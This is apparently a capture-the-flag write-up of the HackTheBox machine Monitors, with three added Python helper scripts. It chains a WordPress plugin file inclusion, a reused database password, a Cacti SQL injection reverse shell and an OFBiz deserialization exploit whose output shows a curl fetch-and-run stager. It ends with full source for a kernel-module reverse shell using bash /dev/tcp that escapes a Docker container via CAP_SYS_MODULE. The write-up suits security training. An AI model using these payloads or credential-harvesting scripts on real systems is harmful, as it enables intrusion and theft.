Monitors - [HTB]

    Monitors is a hard Linux, OSCP-like machine from HackTheBox where you will exploit several web application vulnerabilities until you get the user's credentials. Finally, you will have to escape from a Docker container by abusing one of its Linux capabilities in order to become root on the host.


    As always, let's start by finding all open ports on the machine with nmap.

    kali@kali:~/Documents/HTB/Monitors$ sudo nmap -sS -p- -n -T5 -oN AllPorts.txt
    Nmap scan report for
    Host is up (0.048s latency).
    Not shown: 65533 closed ports
    22/tcp open  ssh
    80/tcp open  http
    # Nmap done at Sat Jul 24 13:44:49 2021 -- 1 IP address (1 host up) scanned in 55.04 seconds

    Then we continue with a deeper scan of each open port to get more information about every service.

    kali@kali:~/Documents/HTB/Monitors$ sudo nmap -sC -sV -n -T5 -oN PortsDepth.txt -p 22,80
    Nmap scan report for
    Host is up (0.047s latency).
    22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 ba:cc:cd:81:fc:91:55:f3:f6:a9:1f:4e:e8:be:e5:2e (RSA)
    |   256 69:43:37:6a:18:09:f5:e7:7a:67:b8:18:11:ea:d7:65 (ECDSA)
    |_  256 5d:5e:3f:67:ef:7d:76:23:15:11:4b:53:f8:41:3a:94 (ED25519)
    80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
    |_http-server-header: Apache/2.4.29 (Ubuntu)
    |_http-title: Site doesn't have a title (text/html; charset=iso-8859-1).
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Accessing port 80 we get a message telling us that the web server cannot be reached through its IP address, so it expects a hostname (a virtual host).

    direct ip access is not allowed

    Adding the domain from the email address, monitors.htb, to the /etc/hosts file, we can access the following WordPress page.


    Enumerating with wpscan we can list the installed plugins.

    $ wpscan --url http://monitors.htb/ -e ap,u,cb
    [i] Plugin(s) Identified:
    [+] wp-with-spritz
     | Location: http://monitors.htb/wp-content/plugins/wp-with-spritz/
     | Latest Version: 1.0 (up to date)
     | Last Updated: 2015-08-20T20:15:00.000Z
     | Found By: Urls In Homepage (Passive Detection)
     | Version: 4.2.4 (80% confidence)
     | Found By: Readme - Stable Tag (Aggressive Detection)
     |  - http://monitors.htb/wp-content/plugins/wp-with-spritz/readme.txt

    The WP with Spritz plugin (version 1.0, last updated in 2015) has a known local/remote file inclusion (LFI/RFI) vulnerability.


    Thanks to the inclusion we can read /etc/passwd and find the users with a login shell on the system.

    marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash

    Furthermore, we can read wp-config.php for the WordPress database credentials, and the Apache configuration reveals another virtual host.

    /** MySQL database username */
    define( 'DB_USER', 'wpadmin' );
    /** MySQL database password */
    define( 'DB_PASSWORD', 'BestAdministrator@2020!' );
    # Default virtual host settings
    # Add monitors.htb.conf
    # Add cacti-admin.monitors.htb.conf
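
    As an added example (not part of the original write-up), the following Python script does the harvesting described above in one place: it builds the inclusion URL, parses /etc/passwd for login-capable accounts, pulls the DB_* constants out of wp-config.php and extracts extra virtual host names from the Apache configuration. The inclusion parameter in LFI_PARAM is an assumption (the write-up does not show it); the sample inputs are constructed from the fragments shown above so the parsers run offline, and pull() is the only function that touches the network.

```python
"""LFI harvesting helpers for the files read through the Spritz inclusion.

Added example, not from the original write-up. The parsers are pure
functions and are run here on constructed sample text, so the script works
offline; pull() is the only function that touches the network.
"""
import re
from urllib.request import urlopen

# ASSUMPTION: the plugin's vulnerable include parameter (not shown in the write-up).
LFI_PARAM = "wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url="
NO_LOGIN = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}

# Constructed samples, modelled on the fragments shown in the write-up.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
mysql:x:111:115:MySQL Server,,,:/nonexistent:/bin/false
marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash
"""
SAMPLE_WP_CONFIG = """<?php
/** MySQL database username */
define( 'DB_USER', 'wpadmin' );
/** MySQL database password */
define( 'DB_PASSWORD', 'BestAdministrator@2020!' );
define('DB_HOST', 'localhost');
"""
SAMPLE_APACHE = """# Default virtual host settings
# Add monitors.htb.conf
# Add cacti-admin.monitors.htb.conf
"""

DEFINE_RE = re.compile(r"""define\(\s*['"](DB_\w+)['"]\s*,\s*['"]([^'"]*)['"]\s*\)""")


def lfi_url(base, path):
    """Inclusion URL for an absolute path on the target."""
    return base.rstrip("/") + "/" + LFI_PARAM + path


def pull(base, path, timeout=10):
    """Read a file through the inclusion (network; not used offline)."""
    with urlopen(lfi_url(base, path), timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


def login_users(passwd_text):
    """root plus regular users (uid >= 1000) that have a real login shell."""
    users = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            continue  # blank or garbled line
        name, _, uid, _, _, home, shell = fields
        uid = int(uid)
        if (uid == 0 or uid >= 1000) and shell not in NO_LOGIN:
            users.append({"name": name, "uid": uid, "home": home, "shell": shell})
    return users


def wp_db_creds(config_text):
    """DB_* constants from wp-config.php; the password is reused on this box."""
    return dict(DEFINE_RE.findall(config_text))


def vhost_names(apache_text):
    """Hostnames an Apache config gives away: ServerName/ServerAlias values and
    '# Add <name>.conf' comments, which is how the cacti-admin vhost leaked here."""
    names = set(re.findall(r"^\s*Server(?:Name|Alias)\s+(\S+)", apache_text, re.M))
    names.update(re.findall(r"#\s*Add\s+([\w.-]+)\.conf", apache_text))
    return sorted(names)


if __name__ == "__main__":
    print("login users:", [u["name"] for u in login_users(SAMPLE_PASSWD)])
    print("db creds:", wp_db_creds(SAMPLE_WP_CONFIG))
    print("extra vhosts:", vhost_names(SAMPLE_APACHE))
    print("next request:", lfi_url("http://monitors.htb", "/etc/apache2/apache2.conf"))
```

    Every hostname returned by vhost_names() needs its own /etc/hosts entry before the browser (or wpscan) will reach it, since the server refuses requests addressed by IP.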

    Adding the domain cacti-admin.monitors.htb to /etc/hosts we can access the Cacti login form.


    We can log in as admin with the MySQL database password (password reuse).

    Cacti 1.2.12 has a public exploit (an authenticated SQL injection that leads to command execution) which gives us a reverse shell as the user www-data.

    kali@kali:~/Documents/HTB/Monitors$ python3 -t http://cacti-admin.monitors.htb -u admin -p 'BestAdministrator@2020!' --lhost --lport 443
    [+] Connecting to the server...
    [+] Retrieving CSRF token...
    [+] Got CSRF token: sid:ac3fbf8f5163e68c4ded3c22646f2ca5a6c3961b,1627157074
    [+] Trying to log in...
    [+] Successfully logged in!
    [+] SQL Injection:
    [+] Check your nc listener!
    kali@kali:~/Documents/HTB/Monitors$ nc -lnvp 443
    listening on [any] 443 ...
    connect to [] from (UNKNOWN) [] 36118
    /bin/sh: 0: can't access tty; job control turned off
    $ id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)

    Privilege Escalation 1

    Enumerating the file system we find a systemd service for Cacti backups which executes a script inside marcus's home folder.

    www-data@monitors:/$ find / -name "cacti*" 2>/dev/null
    www-data@monitors:/$ cat /etc/systemd/system/cacti-backup.service

    Reading the script that the service runs we can obtain a password, hardcoded for sshpass.

    www-data@monitors:/home/marcus/.backup$ cat /home/marcus/.backup/
    zip /tmp/${backup_name}.zip /usr/share/cacti/cacti/*
    sshpass -p "${config_pass}" scp /tmp/${backup_name}${backup_name}.zip
    rm /tmp/${backup_name}.zip
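
    As an added example (not from the write-up), the following Python automates that check: it pulls the executables out of the Exec* lines of unit files, skips binaries, and greps readable scripts for password-like assignments, reporting whether the script is world-readable (which is why www-data could read it here). The unit name and script path in the constructed demo tree are assumptions, and the script body mirrors the fragment above with a placeholder scp destination.

```python
"""Find secrets in scripts that systemd units execute.

Added example, not from the write-up: the check that surfaced
cacti-backup.service on this box, automated. The demo unit and script path are
assumptions, built in a temp directory so the script runs offline.
"""
import os
import re
import shlex
import tempfile
from pathlib import Path

EXEC_RE = re.compile(r"^\s*Exec(?:Start|StartPre|StartPost|Stop|Reload)\s*=\s*[-@+!:]*(.+)$", re.M)
# "password=" / "secret:" style assignments and "sshpass -p"; the value is group 1
SECRET_RE = re.compile(
    r"(?i)(?:(?:pass(?:word|wd)?|secret|token)\w*\s*[=:]\s*|sshpass\s+-p\s*)['\"]?([^'\"\s]+)")


def exec_paths(unit_text):
    """Absolute paths (interpreter and script arguments) from Exec* lines."""
    paths = []
    for cmdline in EXEC_RE.findall(unit_text):
        paths += [tok for tok in shlex.split(cmdline) if tok.startswith("/")]
    return paths


def secrets_in(text):
    """Literal secret values; variable references like ${config_pass} are skipped."""
    return [v for v in SECRET_RE.findall(text) if not v.startswith("$")]


def looks_binary(path):
    """Executables (ELF, Mach-O, ...) have NUL bytes early on; scripts do not."""
    with open(path, "rb") as f:
        return b"\x00" in f.read(512)


def scan_units(unit_dirs):
    """Readable, non-binary Exec* targets of every *.service file, with any secrets found."""
    findings = []
    for unit_dir in unit_dirs:
        for unit in sorted(Path(unit_dir).glob("*.service")):
            for target in exec_paths(unit.read_text(errors="replace")):
                p = Path(target)
                if not p.is_file() or not os.access(p, os.R_OK) or looks_binary(p):
                    continue
                world_readable = bool(p.stat().st_mode & 0o004)
                for secret in secrets_in(p.read_text(errors="replace")):
                    findings.append({"unit": unit.name, "script": str(p),
                                     "world_readable": world_readable, "secret": secret})
    return findings


def build_demo_tree():
    """Constructed stand-in for the box: a unit in etc/systemd/system running a
    world-readable script in marcus's home. Returns the unit directory."""
    root = Path(tempfile.mkdtemp())
    script = root / "home/marcus/.backup/backup.sh"  # ASSUMED script name
    script.parent.mkdir(parents=True)
    script.write_text(
        "#!/bin/bash\n"
        'backup_name="cacti_backup"\n'
        'config_pass="VerticalEdge2020"\n'
        "zip /tmp/${backup_name}.zip /usr/share/cacti/cacti/*\n"
        'sshpass -p "${config_pass}" scp /tmp/${backup_name}.zip user@backup-host:/backups/\n'
        "rm /tmp/${backup_name}.zip\n")
    script.chmod(0o755)  # readable by everyone, which is the actual bug
    unit_dir = root / "etc/systemd/system"
    unit_dir.mkdir(parents=True)
    (unit_dir / "cacti-backup.service").write_text(
        "[Unit]\nDescription=Cacti backup\n\n"
        f"[Service]\nType=oneshot\nExecStart=/bin/bash {script}\n")
    return unit_dir


if __name__ == "__main__":
    # On a real box: scan_units(["/etc/systemd/system", "/lib/systemd/system"])
    for hit in scan_units([build_demo_tree()]):
        print(hit)
```

    On a real target point scan_units() at /etc/systemd/system and /lib/systemd/system; a hit whose world_readable flag is set is readable from any low-privileged shell, exactly the situation that handed out marcus's password here.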

    This password is reused for marcus's account, so we can su to it and read the user flag.

    www-data@monitors:~$ su marcus
    Password: VerticalEdge2020
    marcus@monitors:~/.backup$ id
    uid=1000(marcus) gid=1000(marcus) groups=1000(marcus)
    marcus@monitors:~$ cat user.txt

    Privilege Escalation 2

    Running linpeas shows port 8443 listening only on localhost.

    tcp        0      0*               

    We can reach it from Kali using SSH local port forwarding (-L) with marcus's credentials.

    kali@kali:~/Documents/HTB/Monitors$ ssh marcus@ -L -fN

    Browsing to the forwarded port over HTTPS in Firefox gives a Tomcat error page that reveals the version (9.0.31). The application served on this port is Apache OFBiz (which embeds Tomcat), and looking for associated vulnerabilities we find the Metasploit module apache_ofbiz_deserialization. Its automatic check reports the target as not exploitable, so forceexploit has to be set to true for the module to run anyway.

    msf6 > use exploit/linux/http/apache_ofbiz_deserialization
    msf6 exploit(linux/http/apache_ofbiz_deserialization) > set rhosts
    msf6 exploit(linux/http/apache_ofbiz_deserialization) > set payload linux/x86/shell/reverse_tcp
    msf6 exploit(linux/http/apache_ofbiz_deserialization) > set lhost
    msf6 exploit(linux/http/apache_ofbiz_deserialization) > set lport 4444
    msf6 exploit(linux/http/apache_ofbiz_deserialization) > set forceexploit true
    msf6 exploit(linux/http/apache_ofbiz_deserialization) > show options
    Module options (exploit/linux/http/apache_ofbiz_deserialization):
       Name       Current Setting  Required  Description
       ----       ---------------  --------  -----------
       Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
       RHOSTS        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT      8443             yes       The target port (TCP)
       SSL        true             no        Negotiate SSL/TLS for outgoing connections
       SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
       TARGETURI  /                yes       Base path
       URIPATH                     no        The URI to use for this exploit (default is random)
       VHOST                       no        HTTP server virtual host
    Payload options (linux/x86/shell/reverse_tcp):
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST      yes       The listen address (an interface may be specified)
       LPORT  4444             yes       The listen port
    Exploit target:
       Id  Name
       --  ----
       1   Linux Dropper
    msf6 exploit(linux/http/apache_ofbiz_deserialization) > run
    [*] Started reverse TCP handler on 
    [*] Executing automatic check (disable AutoCheck to override)
    [!] The target is not exploitable. Target cannot deserialize arbitrary data. ForceExploit is enabled, proceeding with exploitation.
    [*] Executing Linux Dropper for linux/x86/shell/reverse_tcp
    [*] Using URL:
    [*] Local IP:
    [+] Successfully executed command: sh -c curl${IFS}-so${IFS}/tmp/RXsgDGlc${IFS};chmod${IFS}+x${IFS}/tmp/RXsgDGlc;/tmp/RXsgDGlc;rm${IFS}-f${IFS}/tmp/RXsgDGlc
    [*] Client (curl/7.64.0) requested /re6R4gMz4969w
    [*] Sending payload to (curl/7.64.0)
    [*] Command Stager progress - 103.95% done (158/152 bytes)
    [*] Sending stage (36 bytes) to
    [*] Command shell session 1 opened ( -> at 2021-07-25 18:54:45 +0200
    [*] Server stopped.
    uid=0(root) gid=0(root) groups=0(root)

    Now we are root, but inside a Docker container (note the container ID in the hostname) that has been granted extra capabilities.

    root@77ff21ad5db2:/tmp/temp# capsh --print
    capsh --print
    Current: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+eip
    Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
    Securebits: 00/0x0/1'b0
     secure-noroot: no (unlocked)
     secure-no-suid-fixup: no (unlocked)
     secure-keep-caps: no (unlocked)

    Among them, CAP_SYS_MODULE stands out: since the container shares the host's kernel, being allowed to load a kernel module means running code as root on the host, following this post.
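
    As an added example (not from the write-up), the following Python decodes the CapEff bitmask from /proc/<pid>/status without needing capsh, shows which capabilities go beyond Docker's default set (so must have been added with --cap-add or --privileged), and maps the dangerous ones to the escape they enable. The sample status text is constructed to match the capsh output above; the Docker default mask 0xa80425fb is the one from moby's defaults.

```python
"""Decode a process's effective capability mask and flag container-escape routes.

Added example, not from the write-up. Works from /proc/<pid>/status, which is
available even when capsh is not installed in the container.
"""
# Linux capability numbers, index == bit position (include/uapi/linux/capability.h)
CAP_NAMES = [
    "cap_chown", "cap_dac_override", "cap_dac_read_search", "cap_fowner",
    "cap_fsetid", "cap_kill", "cap_setgid", "cap_setuid", "cap_setpcap",
    "cap_linux_immutable", "cap_net_bind_service", "cap_net_broadcast",
    "cap_net_admin", "cap_net_raw", "cap_ipc_lock", "cap_ipc_owner",
    "cap_sys_module", "cap_sys_rawio", "cap_sys_chroot", "cap_sys_ptrace",
    "cap_sys_pacct", "cap_sys_admin", "cap_sys_boot", "cap_sys_nice",
    "cap_sys_resource", "cap_sys_time", "cap_sys_tty_config", "cap_mknod",
    "cap_lease", "cap_audit_write", "cap_audit_control", "cap_setfcap",
    "cap_mac_override", "cap_mac_admin", "cap_syslog", "cap_wake_alarm",
    "cap_block_suspend", "cap_audit_read", "cap_perfmon", "cap_bpf",
    "cap_checkpoint_restore",
]

# Docker's default capability set; anything beyond it was granted explicitly.
DOCKER_DEFAULT = 0x00000000A80425FB

# Capabilities that, held as root in a container, give a known route onto the host.
ESCAPE_HINTS = {
    "cap_sys_module": "insmod a module into the shared host kernel (this box)",
    "cap_sys_admin": "mount host block devices / cgroup release_agent tricks",
    "cap_sys_ptrace": "ptrace a host process visible in the PID namespace",
    "cap_dac_read_search": "open_by_handle_at() to read arbitrary host files",
    "cap_sys_rawio": "raw access to /dev/mem and block devices",
}


def decode_caps(mask):
    """Capability names set in an integer or hex-string bitmask, in bit order."""
    if isinstance(mask, str):
        mask = int(mask, 16)
    return [name for bit, name in enumerate(CAP_NAMES) if mask >> bit & 1]


def cap_eff_from_status(status_text):
    """Effective set from the text of /proc/<pid>/status."""
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            return int(line.split()[1], 16)
    raise ValueError("no CapEff line in status text")


def beyond_docker_default(mask):
    """Capabilities that must have come from --cap-add (or --privileged)."""
    return decode_caps(mask & ~DOCKER_DEFAULT)


def escape_hints(mask):
    return {cap: ESCAPE_HINTS[cap] for cap in decode_caps(mask) if cap in ESCAPE_HINTS}


def report(status_text):
    mask = cap_eff_from_status(status_text)
    return {
        "effective": decode_caps(mask),
        "added": beyond_docker_default(mask),
        "escapes": escape_hints(mask),
    }


# Constructed sample: Docker's defaults plus CAP_SYS_MODULE (bit 16), i.e. the
# same set capsh printed inside the container on this box.
SAMPLE_STATUS = (
    "Name:\tsh\nCapInh:\t00000000a80525fb\nCapPrm:\t00000000a80525fb\n"
    "CapEff:\t00000000a80525fb\nCapBnd:\t00000000a80525fb\n"
)

if __name__ == "__main__":
    try:
        with open("/proc/self/status") as f:
            text = f.read()
    except OSError:  # not on Linux: fall back to the constructed sample
        text = SAMPLE_STATUS
    for key, value in report(text).items():
        print(f"{key}: {value}")
```

    The "added" list is the quickest tell during a container assessment: an empty list means a default Docker run, while anything in it is a deliberate grant worth checking against ESCAPE_HINTS.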

    Going straight to the point, you need to create the two files below (you can also write them on your Kali machine and download them into the container).

    Note: do not forget to put your Kali listener's IP and port in the /dev/tcp path, and the recipe lines in the Makefile MUST be indented with tabs, not spaces.

    root@77ff21ad5db2:/tmp/temp# cat reverse-shell.c
    #include <linux/kmod.h>
    #include <linux/module.h>
    MODULE_LICENSE("GPL");
    MODULE_DESCRIPTION("LKM reverse shell module");
    /* Listener IP and port go after /dev/tcp/ (elided in this write-up) */
    char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/ 0>&1", NULL};
    static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };
    /* Runs on insmod: the kernel's usermode helper spawns the shell as root, outside the container */
    static int __init reverse_shell_init(void) {
        return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
    }
    static void __exit reverse_shell_exit(void) {
        printk(KERN_INFO "Exiting\n");
    }
    module_init(reverse_shell_init);
    module_exit(reverse_shell_exit);
    root@77ff21ad5db2:/tmp/temp# cat Makefile
    obj-m += reverse-shell.o
    all:
    	make -C /lib/modules/4.15.0-142-generic/build M=$(PWD) modules
    clean:
    	make -C /lib/modules/4.15.0-142-generic/build M=$(PWD) clean

    Then run make in the directory where the files are stored, which should produce the following output. Note that the build targets the host's kernel (4.15.0-142-generic), whose headers happen to be installed in the container under /usr/src; the module has to match the host kernel because that is where insmod will load it.

    root@77ff21ad5db2:/tmp/temp# make
    make -C /lib/modules/4.15.0-142-generic/build M=/tmp/temp modules
    make[1]: Entering directory '/usr/src/linux-headers-4.15.0-142-generic'
      CC [M]  /tmp/temp/reverse-shell.o
      Building modules, stage 2.
      MODPOST 1 modules
      CC      /tmp/temp/reverse-shell.mod.o
      LD [M]  /tmp/temp/reverse-shell.ko
    make[1]: Leaving directory '/usr/src/linux-headers-4.15.0-142-generic'

    Finally, listen with nc on port 4445 on Kali and load the module with insmod. The shell is spawned by the kernel's usermode helper, so it comes back as root on the host (note the hostname monitors instead of the container ID), outside the container's namespaces.

    root@77ff21ad5db2:/tmp/temp# insmod reverse-shell.ko
    insmod reverse-shell.ko
    kali@kali:~/Documents/HTB/Monitors$ nc -nlvp 4445
    listening on [any] 4445 ...
    connect to [] from (UNKNOWN) [] 37878
    bash: cannot set terminal process group (-1): Inappropriate ioctl for device
    bash: no job control in this shell
    root@monitors:/# cat /root/root.txt